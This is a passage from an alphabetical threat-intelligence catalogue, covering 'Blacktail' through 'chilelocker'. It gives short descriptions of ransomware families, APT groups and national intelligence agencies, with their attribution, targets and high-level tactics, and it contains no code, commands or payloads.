Blacktail is a cybercrime group that has gained attention for its ransomware campaigns, particularly the Buhti ransomware. They are known for using custom-built data exfiltration tools and have been observed exploiting vulnerabilities in both Windows and Linux systems.
Blacktor
Blacktor is an active extortion or ransomware group tracked by RansomLook.
Blackwater
Blackwater is an active extortion or ransomware group tracked by RansomLook.
Blackwood
Blackwood is a China-aligned APT group that has been active since at least 2018. They primarily engage in cyberespionage operations targeting individuals and companies in China, Japan, and the United Kingdom. Blackwood utilizes sophisticated techniques such as adversary-in-the-middle attacks to deliver their custom implant, NSPX30, through updates of legitimate software. They also have the capability to hide the location of their command and control servers by intercepting traffic generated by the implant.
BlackWorm
BlackWorm Ransomware is a malicious computer infection that encrypts your files, and then does everything it can to prevent you from restoring them. It needs you to pay $200 for the decryption key, but there is no guarantee that the people behind this infection would really issue the decryption tool for you.
BladedFeline
BladedFeline is an Iran-aligned APT group that has been active since at least 2017, targeting Iraqi and Kurdish government officials for cyberespionage. The group employs a variety of tools, including the Shahmaran backdoor, Whisper, and PrimeCache, which is a malicious IIS module. BladedFeline utilizes techniques such as spearphishing (T1566), exploiting public-facing applications (T1190), and timestomping to maintain access and exfiltrate data. The group is assessed with medium confidence to be a subgroup of OilRig, focusing on strategic access to high-ranking officials in the region.
BladeHawk
BladeHawk is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Blank
Ransomware
BleedGreen Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 500$ in bitcoins. Requires .NET Framework 4.0. Gets into your startup system and sends you notes like the one below: https://4.bp.blogspot.com/-xrr6aoB_giw/WG1UrGpmZJI/AAAAAAAAC-Q/KtKdQP6iLY4LHaHgudF5dKs6i1JHQOBmgCLcB/s1600/green1.jpg
Blind
Ransomware
Blitzkrieg
Ransomware
Blocatto
Ransomware Based on HiddenTear
BlockFile12
Ransomware
Blocky
ransomware
BloodJaws
Ransomware
Blooper
Ransomware
Blue Termite
Blue Termite is a group of suspected Chinese origin active in Japan.
Blue Tsunami
Blue Tsunami, also known as Black Cube, is a cyber mercenary group associated with the private intelligence firm Black Cube. They target individuals in various industries, including human rights, finance, and consulting. Blue Tsunami engages in social engineering and uses techniques such as honeypot profiles, fake jobs, and fake companies to gather human intelligence for their clients. LinkedIn and Microsoft recently took down numerous fake accounts and company pages linked to Blue Tsunami.
BlueBottle
Bluebottle, a cyber-crime group that specializes in targeted attacks against the financial sector, is continuing to mount attacks on banks in Francophone countries. The group makes extensive use of living off the land, dual-use tools, and commodity malware, with no custom malware deployed in this campaign.
Bluebox
Bluebox is an active extortion or ransomware group tracked by RansomLook.
BlueCheeser
Ransomware
BlueEagle
ransomware
BlueHornet
BlueHornet is an advanced persistent threat group targeting government organizations in China, North Korea, Iran, and Russia. They have compromised and leaked data from other APT groups like Kryptonite Panda and Lazarus Group. BlueHornet has been involved in campaigns such as Operation Renminbi, Operation Ruble, and Operation EUSec, focusing on exfiltrating region-specific data and selling it on the dark web. They have also been known to collaborate with different threat actors and have recently disclosed a zero-day exploit in NGINX 1.18.
Bluerose
Ransomware
Bluesky
Ransomware.
b0 Group
b0 Group is an active extortion or ransomware group tracked by RansomLook.
Bober
Bober is an active extortion or ransomware group tracked by RansomLook.
Bohrium
Bohrium is an Iranian threat actor that has been involved in spear-phishing operations targeting organizations in the US, Middle East, and India. They often create fake social media profiles, particularly posing as recruiters, to trick victims into running malware on their computers. Microsoft's Digital Crimes Unit has taken legal action and seized 41 domains used by Bohrium to disrupt their activities. The group has shown a particular interest in sectors such as technology, transportation, government, and education.
BOK
Ransomware
Bolivarian National Intelligence Service
Bolivarian National Intelligence Service - Servicio Bolivariano de Inteligencia (SEBIN)
Bonacigroup
Bonacigroup is an active extortion or ransomware group tracked by RansomLook.
Bondnet
Bondnet is a threat actor that deploys backdoors and cryptocurrency miners. They use high-performance bots as C2 servers and configure reverse RDP environments on compromised systems. Bondnet has infected over 15,000 Windows server machines worldwide, primarily targeting Windows Server 2008 R2 systems. The botnet is used for mining cryptocurrencies like Monero, ByteCoin, RieCoin, and ZCash, potentially earning the operator thousands of dollars per day.
Bonsoir
ransomware
Boolka
Boolka is a threat actor known for infecting websites with malicious JavaScript scripts for data exfiltration. They have been carrying out opportunistic SQL injection attacks since at least 2022. Boolka has developed a malware delivery platform based on the BeEF framework and has been distributing the BMANAGER trojan. Their activities demonstrate a progression from basic website infections to more sophisticated malware operations.
BooM
Ransomware
BoooamCrypt
Ransomware
Booyah
Ransomware EXE was replaced to neutralize threat
Border Guard (Poland)
Operations and Investigations Directorate of the Border Guard Headquarters - Zarząd Operacyjno-Śledczy Komendy Głównej Straży Granicznej (KGSG, ZOŚ, KGSG)
Boris HT
Ransomware
BOSON SPIDER
BOSON SPIDER is a cyber criminal group, which was first identified in 2015, recently and inexplicably went dark in the spring of 2016, appears to be a tightly knit group operating out of Eastern Europe. They have used a variety of distribution mechanisms such as the infamous (and now defunct) angler exploit kit, and obfuscated JavaScript to reduce the detection by antivirus solutions.
BOSS SPIDER
Throughout 2018, CrowdStrike Intelligence tracked BOSS SPIDER as it regularly updated Samas ransomware and received payments to known Bitcoin (BTC) addresses. This consistent pace of activity came to an abrupt halt at the end of November 2018 when the U.S. DoJ released an indictment for Iran-based individuals Faramarz Shahi Savandi and Mohammad Mehdi Shah Mansouri, alleged members of the group.
Boulder Bear
First observed activity in December 2013.
bqtlock
aka BaqiyatLock
br0k3r
Br0k3r is not a conventional ransomware gang, but rather an Iran-linked cyber espionage and access brokerage group leveraging its foothold within victim networks to facilitate ransomware operations. Active since around 2017, the group provides privileged domain access—often sold or shared directly—with known ransomware operators such as ALPHV/BlackCat, NoEscape, and RansomHouse, receiving a portion of each successful ransom payout. Victims have included U.S. schools, municipal governments, financial and healthcare organizations, as well as targets in Israel, Azerbaijan, and the UAE. Br0k3r’s strategy merges espionage with criminal collaboration, allowing them to support both state-aligned intelligence objectives and financial incentives.
brain cipher
In mid-June 2024, a new ransomware operation named Brain Cipher emerged, notably targeting Indonesia's National Data Center. This attack disrupted immigration operations at airports and various other government services. The payload employed by this group is based on the leaked LockBit 3.0 builder. Comparative analyses have confirmed significant similarities between Brain Cipher and LockBit 3.0 samples. Notably, the attackers modified the ransomware to not only append a new extension to encrypted files but also to encrypt the filenames themselves. Additionally, it was identified that the group appears to be in its early stages, as evidenced by their use of the leaked LockBit 3.0 builder and their recent operations. After encrypting the data, the ransomware generates ransom notes named “added_extension.README.txt.” These notes contain a description of what occurred and a link to the attackers' website hosted on the Tor network.
BrainCrypt Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. So far the victims are from Belarus and Germany.
BrainLag
Ransomware
BRansomware
Ransomware
Bravox
Bravox is an active extortion or ransomware group tracked by RansomLook.
BrazenBamboo
BrazenBamboo is a Chinese state-affiliated threat actor known for developing the LIGHTSPY, DEEPDATA, and DEEPPOST malware families. Their infrastructure includes capabilities for zero-day exploitation, specifically targeting vulnerabilities like FortiClient, and employs a command-and-control architecture that supports multi-platform operations. Volexity's analysis indicates that BrazenBamboo is a well-resourced entity with a focus on domestic targets, utilizing custom analyst software to manage data collected from their malware. The ongoing development of their malware families is evidenced by the timestamps associated with their latest payloads.
Brazilian Globe
Ransomware
Brazilian Intelligence Agency
Brazilian Intelligence Agency (ABIN)
Brazilian
Ransomware Based on EDA2
BreachLaboratory
BreachLaboratory is a cybercrime actor that specializes in the extraction and sale of sensitive financial and identity datasets from various organizations. They have claimed to exfiltrate approximately 950,000 records from Grupo Catalana Occidente and over 18,000 records from Bank Mandiri, with data including customer names, account details, and SWIFT codes. The actor operates on underground forums, selling structured datasets such as CSV files and SQL dumps, and emphasizes the validity and financial utility of the data. Their activities indicate a focus on monetization through direct database sales and potential downstream fraud enablement.
Brick
Ransomware
BrickR
Ransomware
Brigada de Investigación Tecnológica
Technological Research Brigade (BIT)
BrLock
Ransomware
BRONZE EDGEWOOD
In early 2021 CTU researchers observed BRONZE EDGEWOOD exploiting the Microsoft Exchange Server of an organization in Southeast Asia. The threat group deployed a China Chopper webshell and ran the Nishang Invoke-PowerShellTcp.ps1 script to connect back to C2 infrastructure. The threat group is publicly linked to malware families Chinoxy, PCShare and FunnyDream. CTU researchers have discovered that BRONZE EDGEWOOD also leverages Cobalt Strike in its intrusion activity. BRONZE EDGEWOOD has been active since at least 2018 and targets government and private enterprises across Southeast Asia. CTU researchers assess with moderate confidence that BRONZE EDGEWOOD operates on behalf the Chinese government and has a remit that covers political espionage.
BRONZE HIGHLAND
BRONZE HIGHLAND has been observed using spearphishing as an initial infection vector to deploy the MgBot remote access trojan against targets in Hong Kong. Third party reporting suggests the threat group also targets India, Malaysia and Taiwan and leverages Cobalt Strike and KsRemote Android Rat. CTU researchers assess with moderate confidence that BRONZE HIGHLAND operates on behalf of China and has a remit covering espionage against domestic human rights and pro-democracy advocates and nations neighbouring China
BRONZE SPIRAL
In December 2020, the IT management software provider SolarWinds announced that an unidentified threat actor had exploited a vulnerability in their Orion Platform software to deploy a web shell dubbed SUPERNOVA. CTU researchers track the operators of the SUPERNOVA web shell as BRONZE SPIRAL and assess with low confidence that the group is of Chinese origin. SUPERNOVA was likely deployed through exploitation of CVE-2020-10148, and CTU researchers observed post-exploitation reconnaissance commands roughly 30 minutes before the web shell was deployed. This may have been indicative of the threat actor conducting scan-and-exploit activity and then triaging for victims of particular interest, before deploying SUPERNOVA and attempting to dump credentials and move laterally. BRONZE SPIRAL has been associated with previous intrusions involving the targeting of ManageEngine servers, maintenance of long-term access to periodically harvest credentials and exfiltrate data, and espionage or theft of intellectual property. The threat group makes extensive use of native system tools and 'living off the land' techniques.
BRONZE SPRING
BRONZE SPRING is a threat group that CTU researchers assess with high confidence operates on behalf of China in the theft of intellectual property from defense, engineering, pharmaceutical and technology companies. The threat group typically uses scan-and-exploit for initial access, deploys the China Chopper webshell for remote execution and persistence, and creates RAR archives with a '.jpg' file extension for data exfiltration. In July 2020 the U.S. Department of Justice indicted two Chinese hackers CTU researchers assess are members of the BRONZE SPRING threat group. The Department of Justice allege these hackers were responsible for compromising networks of hundreds of organisations and individuals in the U.S. and abroad since 2009, and that exfiltrated data would be passed to the Chinese Ministry of State Security or sold for financial gain.
BRONZE STARLIGHT
BRONZE STARLIGHT has been active since mid 2021 and targets organizations globally across a range of industry verticals. The group leverages HUI Loader to load Cobalt Strike and PlugX payloads for command and control. CTU researchers have observed BRONZE STARLIGHT deploying ransomware to compromised networks as part of name-and-shame ransomware schemes, and posted victim names to leak sites. CTU researchers assess with moderate confidence that BRONZE STARLIGHT is located in China based on observed tradecraft, including the use of HUI Loader and PlugX which are associated with China-based threat group activity. It is plausible that BRONZE STARLIGHT deploys ransomware as a smokescreen rather than for financial gain, with the underlying motivation of stealing intellectual property theft or conducting espionage.
BRONZE VAPOR
BRONZE VAPOR is a targeted threat group assessed with moderate confidence to be of Chinese origin. Artefacts from tools associated with this group and open source reporting on related incidents indicate that BRONZE VAPOR have operated since at least 2017. The group conducts espionage against multiple industries including semiconductors, aviation and telecommunications. CTU researchers assess BRONZE VAPOR's intent to be information theft, with operations focused on intellectual property (semiconductors) and personally identifiable information such as traveller records (aviation). Compromise of telecommunications companies can yield personally identifiable information and meta data on client communications such as Call Data Records (CDR). Prior to 2019 their operational focus, with some exceptions, revolved around targets in East Asia particularity Taiwan with it's thriving semiconductor industry. In 2021 details emerged in open source of attacks on at least one European semiconductor company believed to date back to 2017. In 2019 BRONZE VAPOR attacked one of more entities in the European airlines sector. The group gains initial access via VPN services, may use spearphishing with 'Letter of Appointment' themed lures, and deploys Cobalt Strike along with custom data exfiltration tools to target organizations. Post-intrusion activity involves living-of-the-land using legitimate tools and commands available within victim environment as well as using AceHash for credential harvesting, WATERCYCLE for data exfiltration and STOCKPIPE for proxying information through Microsoft Exchange servers over email. BRONZE VAPOR uses a set of tactics that, although not individually unique, when viewed in aggregate create a relatively distinct playbook. Intrusions begin with credential based attacks against an existing remote access solution (Citrix, VPN etc.) or B2B network access. Cobalt Strike is deployed into the environment and further access is then conducted via Cobalt Strike Beacon and other features of the platform. Sharphound is deployed to map out the victim's Active Directory infrastructure and and collect critical information about the domain including important account names. Command and control infrastructure is hosted on subdomains of Azure and Appspot services to blend in with legitimate traffic. The threat actor also registers their own domains for command and control, often with a "sync" or "update" related theme. WinRAR is commonly used for compressing data prior to exfiltration. Filenames for these archives often involve a string of numbers and variations of the word "update". Data is exfiltrated using WATERCYCLE to cloud based platforms such as OneDrive and GoogleDrive.
Brotherhood
Brotherhood is an active extortion or ransomware group tracked by RansomLook.
Browlock
Ransomware no local encryption, browser only
BTCamant Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Original name is Mission 1996 or Mission: “Impossible” (1996) (like the movie)
BtcKING
Ransomware
BTCLocker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
BTCWare-Aleta
Ransomware
BTCWare-Gryphon
Ransomware
BTCWare-Master
Ransomware
BTCWare-Nuclear
Ransomware
BTCWare-Onyon
Ransomware
BTCWare-PayDay
Ransomware
BTCWare Related to / new version of CryptXXX
Ransomware
BTCWare-Wyvern
Ransomware
Bucbi
Ransomware no file name change, no extension
Bud
Ransomware
Buddyransome
Buddyransome is an active extortion or ransomware group tracked by RansomLook.
Budminer
Based on the evidence we have presented Symantec attributed the activity involving theDripion malware to the Budminer advanced threat group. While we have not seen newcampaigns using Taidoor malware since 2014, we believe the Budminer group has changedtactics to avoid detection after being outed publicly in security white papers and blogs over thepast few years.
BugWare
Ransomware
BuhTrap
Buhtrap has been active since 2014, however their first attacks against financial institutions were only detected in August 2015. Earlier, the group had only focused on targeting banking clients. At the moment, the group is known to target Russian and Ukrainian banks. From August 2015 to February 2016 Buhtrap managed to conduct 13 successful attacks against Russian banks for a total amount of 1.8 billion rubles ($25.7 mln). The number of successful attacks against Ukrainian banks has not been identified. Buhtrap is the first hacker group using a network worm to infect the overall bank infrastructure that significantly increases the difficulty of removing all malicious functions from the network. As a result, banks have to shut down the whole infrastructure which provokes delay in servicing customers and additional losses. Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central Bank of Russia (further referred to as BCS CBR). We have not identified incidents of attacks involving online money transfer systems, ATM machines or payment gates which are known to be of interest for other criminal groups.
BulbaCrypt HT
Ransomware
Bundesamt für Verfassungsschutz
Bundesamt für Verfassungsschutz (BfV): Federal Office for the Protection of the Constitution
Bundesnachrichtendienst
Bundesnachrichtendienst (BND): Federal Intelligence Service
Buran
Buran is a new version of the Vega ransomware strain (a.k.a. Jamper, Ghost, Buhtrap) that attacked accountants from February through April 2019. The new Buran ransomware first was discovered by nao_sec in June 2019, delivered by the RIG Exploit Kit, as reported by BleepingComputer.
Bureau of Intelligence and Research
Bureau of Intelligence and Research (IR)
Bureau of Intelligence (BI)
Bureau of Intelligence (BI)
Bureau of Investigation (Taiwan)
Investigation Bureau (MJIB)
Bureau of Military Intelligence
Military Intelligence Bureau (MIB)
Bureau of National Investigations
Bureau of National Investigations (BNI) – (Internal Intelligence Agency)
Bureau Of Special Investigation
Bureau Of Special Investigation (BSI)
BuyUnlockCode
Ransomware Does not delete Shadow Copies
BWall
Ransomware
Bytesfromheaven
Bytesfromheaven is an active extortion or ransomware group tracked by RansomLook.
ByteToBreach
ByteToBreach is a prolific cybercriminal who operates across multiple platforms, including DarkForums and Telegram, and has been active since at least June 2025. He exploits known vulnerabilities in cloud and corporate infrastructure, reuses stolen credentials, and employs brute force or misconfiguration tactics for initial access, focusing on data exfiltration of sensitive information from high-value targets. ByteToBreach has established a professional-looking website to promote his services and has demonstrated credible activity, with many of his claims supported by verifiable proof.
C0hen Locker
Ransomware
c3rb3r
Cerber ransomware, active since 2016, has resurfaced occasionally using the name C3RB3R. It operates as a semi-private Ransomware-as-a-Service (RaaS) and targets both Windows and Linux environments. Cerber typically uses AES + RSA cryptographic methods and appends the .L0CK3D extension to encrypted files. It executes operations via phishing, malicious macros, and has even leveraged vulnerabilities such as Atlassian Confluence’s CVE-2023-22518 for deployment. Victims are directed to Tor-hosted payment portals for decryption instructions.
CA$HOUT
Ransomware
Cabinet Intelligence and Research Office
Cabinet Intelligence and Research Office (CIRO)
CACTUS Ransomware Actors
This Group object reflects the tools & TTPs observed in use by threat actors known to deploy CACTUS, a ransomware that researchers believe has been used since at least March 2023.[[Kroll CACTUS Ransomware May 10 2023](/references/f50de2f6-465f-4cae-a79c-cc135ebfee4f)] Specific pre- and post-exploit behaviors may vary among intrusions carried out by distinct actors or actor clusters. TTPs associated with the CACTUS ransomware binary itself can be found in the separate dedicated Software object.
cactus
The CACTUS ransomware is said to have emerged around March 2023. The group became known for exploiting vulnerabilities to gain initial access and maintain a presence within the organization's infrastructure. There is little known information about the ransomware group, except that it emerged on the mentioned date and, following encryption, a text file named 'cAcTuS.readme.txt' would be created. Additionally, encrypted files were altered to the '.cts1' extension, and data exfiltration and victim extortion were conducted through the use of the service known as Tox. As mentioned earlier, the ransomware especially exploits vulnerabilities in VPNs, also utilizing obfuscation techniques to conceal its activities, such as employing UPX and utilizing encryption algorithms like OpenSSL, AES OCB, ChaCha20_Poly1305, system reinitializations, and others.
Cadelle
Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, it’s likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.
CainXPii
Ransomware
Caliente Bandits
Caliente Bandits is a highly active threat group that targets multiple industries, including finance and entertainment. They distribute the Bandook remote access trojan using Spanish-language lures through low-volume email campaigns. The group primarily impacts individuals with Spanish surnames and conducts reconnaissance to obtain employee data. They masquerade as companies in South America and use Hotmail or Gmail email addresses.
Callisto
The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.
Calypso
For the first time, the activity of the Calypso group was detected by specialists of PT Expert Security Center in March 2019, during the work to detect cyber threats. As a result, many malware samples of this group were obtained, affected organizations and control servers of intruders were identified. According to our data, the group has been active since at least September 2016. The main goal of the group is to steal confidential data, the main victims are government agencies from Brazil, India, Kazakhstan, Russia, Thailand, Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.
Camaro Dragon
In early 2023, the Check Point Incident Response Team (CPIRT) team investigated a malware incident at a European healthcare institution involving a set of tools mentioned in the Avast report in late 2022. The incident was attributed to Camaro Dragon, a Chinese-based espionage threat actor whose activities overlap with activities tracked by different researchers as Mustang Panda and LuminousMoth, whose focus is primarily on Southeast Asian countries and their close peers.
Canada Border Services Agency
Canada Border Services Agency (CBSA) Immigrations Intelligence
Canadian Coast Guard
Canadian Coast Guard (CCG)
Canadian Forces Military Police
Canadian Forces National Counter-Intelligence Unit (DND) operated by the Canadian Forces Military Police Group
Canadian Security Intelligence Service
Canadian Security Intelligence Service (CSIS)
Cancer Ransomware FAKE
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. This is a trollware that does not encrypt your files but makes your computer act crazy (like in the video in the link below). It is meant to be annoying and it is hard to erase from your PC, but possible.
Caracal Kitten
Caracal Kitten is an APT group that has been targeting activists associated with the Kurdistan Democratic Party. They employ a mobile remote access Trojan to gain unauthorized access to victims' devices. The group disguises their malware as legitimate mobile apps, tricking users into installing them and granting the hackers access to their personal data.
Caramel Tsunami
Caramel Tsunami is a threat actor that specializes in spyware attacks. They have recently resurfaced with an updated toolset and zero-day exploits, targeting specific victims through watering hole attacks. Candiru has been observed exploiting vulnerabilities in popular browsers like Google Chrome and using third-party signed drivers to gain access to the Windows kernel. They have also been linked to other spyware vendors and have been associated with extensive abuses of their surveillance tools.
Carderbee
Symantec recently reported on activity attributed to a threat actor group dubbed Carderbee. In the campaign, the threat actors target entities in Hong Kong and other regions of Asia via a supply chain attack leveraging the legitimate Cobra DocGuard software. The activity began as early as September 2022.
CardinalLizard
CardinalLizard, a cyber threat actor linked to China, has targeted entities in Asia since 2018. Their methods include spear-phishing, custom malware with anti-detection features, and potentially shared infrastructure with other actors.
Careto
This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or “Mask”) which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date.What makes “The Mask” special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32-and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).
Carmine Tsunami
Carmine Tsunami is a threat actor linked to an Israel-based private sector offensive actor called QuaDream. QuaDream sells a platform called REIGN to governments for law enforcement purposes, which includes exploits, malware, and infrastructure for data exfiltration from mobile devices. Carmine Tsunami is associated with the iOS malware called KingsPawn and has targeted civil society victims, including journalists, political opposition figures, and NGO workers, in various regions. They utilize domain registrars and inexpensive cloud hosting providers, often using single domains per IP address and deploying free Let's Encrypt SSL certificates.
CashRewindo
CashRewindo is a sophisticated threat actor leveraging aged domains in global malvertising campaigns to direct victims to investment scam sites. The group employs TTPs such as flipping between scam ads and innocuous content, as well as A/B testing to exploit time-based creative verification systems. Their operations are characterized by tailored campaigns that utilize localized language and imagery across diverse regions, including Europe, Asia, Africa, and the Americas. Additionally, CashRewindo smuggles malicious code within common JavaScript libraries to enhance their effectiveness.
Cassetto Ransomware
Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.
Cat Scientist Actor
"Cat Scientist" is a username used by a threat actor on underground cybercriminal forums. The actor was observed attempting to sell access to a corporate network gained through compromise of Microsoft Windows RDWeb Virtual Desktop software.[[Dark Web Informer LinkedIn Cat Scientist January 2025](/references/4678131f-7079-4a5f-ac47-06faa3052d8f)]
catb
CatB ransomware was first observed in late 2022, gaining attention for abusing DLL hijacking via the Microsoft Distributed Transaction Coordinator (MSDTC) service—loading a malicious payload through DLL sideloading methods. The malware arrives in a two-stage dropper: the first DLL unpacks and launches the main payload (commonly named oci.dll), which subsequently encrypts files using hybrid RSA/AES cryptography. Unlike conventional ransomware, CatB does not rename files or distribute typical ransom notes; instead, it prepends the ransom message directly to the start of each encrypted file, making detection more difficult. Victims are instructed to contact the attackers via email (e.g., catB9991@protonmail.com or fishA001@protonmail.com), with the ransom demand escalating daily. Initial analysis suggests CatB may be a rebrand or evolution of Pandora ransomware, sharing various code artifacts and operational behavior.
CCECrypt
ransomware
Central de Reunión de Inteligencia Militar
Military Intelligence Collection Center (CRIM) – Central de Reunión de Inteligencia Militar
Central Intelligence Agency
Central Intelligence Agency (CIA)
Central Intelligence Organisation
Central Intelligence Organisation (CIO)
Central Intelligence Service (CIS)[15]
Central Intelligence Service (CIS)[15]
Central Security Treatment Organization
Ransomware
Centro de Inteligencia contra el Terrorismo y el Crimen Organizado
Intelligence Center for Counter-Terrorism and Organized Crime - (Centro de Inteligencia contra el Terrorismo y el Crimen Organizado) (CITCO)
Centro Intelligence Interforze
Centro Intelligence Interforze (CII) - Joint Intelligence Center
Cephalo
Ransomware
Cephalus
Cephalus is an active extortion or ransomware group tracked by RansomLook.
CeranaKeeper
CeranaKeeper is a China-aligned APT that has been active since at least early 2022, primarily targeting governmental institutions in Asian countries. The group employs custom backdoors like TONESHELL and OneDoor, leveraging cloud services such as Dropbox and OneDrive for data exfiltration. CeranaKeeper utilizes techniques like side-loading, brute-force attacks, and the deployment of BAT scripts to extend its reach within compromised networks. Their operations are characterized by a relentless pursuit of sensitive data, adapting their toolset and methods to evade detection.
Cerber
Ransomware
cerberimposter
Cerber Imposer is a post-2019 rebrand of the Cerber ransomware family, resurfacing in late 2021 with updated targeting of enterprise environments. Unlike its classic counterpart, Cerber Imposer utilizes the .locked file extension and includes a unique recovery note named __$$RECOVERY_README$$__.html. It does not reuse the original Cerber codebase; instead it borrows branding while operating under new cryptographic implementations and deployment tactics. Threat actors have leveraged known remote code execution vulnerabilities in Atlassian Confluence (CVE-2021-26084) and GitLab (CVE-2021-22205) to deliver this ransomware. The rebranded variant has compromised servers in the U.S., Germany, China, and Russia, indicating a broader scope of targeting than originally seen with early Cerber campaigns.
Cerberos
Ransomware
cerbersyslock
CerBerSysLock first appeared in December 2017 as a cryptoransomware imposter, leveraging Cerber-style branding to deceive victims. It uses XOR-based encryption to lock files and appends extensions such as .CerBerSysLocked0009881. Victims receive a ransom note titled “HOW TO DECRYPT FILES.txt”, which falsely claims to be from the Cerber ransomware. The note includes an email contact—TerraBytefiles@scryptmail.com—and instructs victims to reference their ID (e.g., "CerBerSysLocked0009881") when communicating. The ransomware is technically linked to the Xorist family and is generally considered an opportunistic, low-profile scam rather than part of a broader Ransomware-as-a-Service (RaaS) operation.
CerberTear Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
ChainedShark
ChainedShark is an APT group targeting China's scientific research sector, particularly professionals in international relations and marine technology, with the intent to steal sensitive data. The group employs advanced techniques, including executable file reconstruction to create fragmented shellcode, and utilizes social engineering tactics to exploit professional scenarios for deceptive attacks. ChainedShark demonstrates a high level of technical sophistication, integrating N-day vulnerability exploits and custom trojans within meticulously designed attack chains. Its operations reflect a mature attack infrastructure and a clear evolutionary trajectory in tactics and execution.
Chamelgang
In Q2 2021, the PT Expert Security Center incident response team conducted an investigation in an energy company. The investigation revealed that the company's network had been compromised by an unknown group for the purpose of data theft. They gave the group the name ChamelGang (from the word "chameleon"), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.
Chaos
Chaos is a rapidly evolving Ransomware-as-a-Service (RaaS) group first observed in early 2025. It is considered distinct and unaffiliated with the Chaos Ransomware Builder that originated around 2021. Known for highly aggressive double-extortion operations, Chaos targets organizations across multiple platforms—Windows, ESXi, Linux, and NAS—with fast, configurable encryption mechanisms and optional partial-file targeting for stealth. Attackers gain access through vulnerabilities, phishing, or brokered credentials, then encrypt files while threatening to leak or destroy stolen data. Notable incidents include the breach of Optima Tax Relief, in which the group exfiltrated 69 GB of sensitive data before encrypting systems.
Charcoal Stork
Charcoal Stork is a threat actor believed to provide content used to fuel malvertising and search engine optimization (SEO) operations, which affiliates ultimately use to deliver malware to victim systems. Charcoal Stork is thought to be financially motivated, operating on a pay-per-install basis.[[Red Canary March 18 2024](/references/a86131cd-1a42-4222-9d39-221dd6e054ba)]
Charmant
Ransomware
Charming Kitten
Charming Kitten (aka Parastoo, aka Newscaster) is an group with a suspected nexus to Iran that targets organizations involved in government, defense technology, military, and diplomacy sectors.
Chartwig Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
CHATTY SPIDER
A cybercriminal actor known to carry out "callback phishing" social engineering attacks.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)]
Chaya_004
Chaya_004 is a Chinese threat actor identified through malicious infrastructure, including a network of servers hosting Supershell backdoors and various pen testing tools of Chinese origin. The actor's activities are linked to the exploitation of a specific vulnerability, with a focus on using Chinese cloud providers. Analysis of the infrastructure has revealed TTPs associated with Chaya_004, indicating a sophisticated approach to cyber operations. Mitigation recommendations and proactive response measures have been developed in light of these findings.
Cheers
Cheers is a Linux-based ransomware variant observed starting in May 2022, engineered specifically to target VMware ESXi servers. The malware was developed from leaked Babuk ransomware source code and leverages the SOSEMANUK stream cipher combined with ECDH key exchange for encryption. It terminates all running virtual machines before renaming and encrypting log files and VM-related extensions—like .vmdk, .vmsn, and .vswp—appending a .Cheers extension. A ransom note titled "How To Restore Your Files.txt" is dropped per directory. The ransomware is attributed to the Chinese-affiliated group BRONZE STARLIGHT (also known as Emperor Dragonfly, DEV-0401), which has previously deployed other strains like Rook, NightSky, and Pandora. Cheers targets a range of industry sectors, with confirmed victims across healthcare, finance, logistics, and manufacturing.
Cheerscrypt
Ransomware
Chekyshka
Ransomware
ChernoLocker
Ransomware
Chernovite
Chernovite is a highly capable and sophisticated threat actor group that has developed a modular ICS malware framework called PIPEDREAM. They are known for targeting industrial control systems and operational technology environments, with the ability to disrupt, degrade, and potentially destroy physical processes. Chernovite has demonstrated a deep understanding of ICS protocols and intrusion techniques, making them a significant threat to critical infrastructure sectors.
Chief directorate of intelligence of the Ministry of Defence of Ukraine
Central Intelligence Directorate – Holovne Upravlinnya Rozvidky (HUR)
chilelocker
